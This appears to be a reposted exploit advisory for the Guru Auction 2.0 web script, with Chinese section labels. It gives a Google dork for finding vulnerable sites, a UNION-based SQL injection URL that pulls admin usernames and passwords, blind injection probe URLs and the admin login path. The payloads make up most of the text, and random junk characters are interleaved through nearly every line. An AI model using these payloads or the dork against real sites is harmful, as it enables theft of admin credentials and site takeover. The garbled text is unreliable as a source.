Guru Auction 2.0 Multiple SQL Injection Vulnerabilities* {1 o4 G+ j1 n; g4 g" Q
7 ]% d: s% V( @- F& W作者 : v3n0m
$ W9 F; i3 h, d& N应用 : Guru Auction 2.0* `. {! U( N4 J1 [8 O
Price : $49# z& \. \& C( O4 D: ]9 N
Vendor : http://www.guruscript.com/
4 K2 z, H+ B) T. R' H) lGoogle Dork : inurl:subcat.php?cate_id=- l% l) Y2 y; C4 B; y9 b% g
; l \: k) m2 A8 ZSQLi p0c:
: K/ o% g" f# \" `~~~~~~~~~~
+ L/ B( n. h4 w; \* ^* _# Y9 e chttp://domain.tld/[path]/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin--0 \. A1 ]# F1 g- B3 ~1 ], J0 h) u0 Y( a
7 V3 d+ B6 i4 C0 U' `( V! {
# N" T* b: `" I- n* p, G; x" S盲注 p0c:
' W) u3 ^' ]" A5 @2 {5 X~~~~~~~~~~
8 ^" F8 C: [- @: X7 thttp://www.political-security.com /[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 << true
+ J7 c* Y P' x& Q2 A0 M* V, ^http://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 << false
* B: [" t# [. i5 m5 y# }( ^8 Q 8 s9 p+ R+ n% I5 `% v V0 S
管理登录入口:
7 P5 D+ ~6 e3 S/ i! H3 l! a2 d3 Y~~~~~~~~~~7 d7 y! P* Y2 X- @3 W$ y9 O& j& o
http://domain.tld/[path]/admin/' S8 o8 b8 Q4 e- _# _
|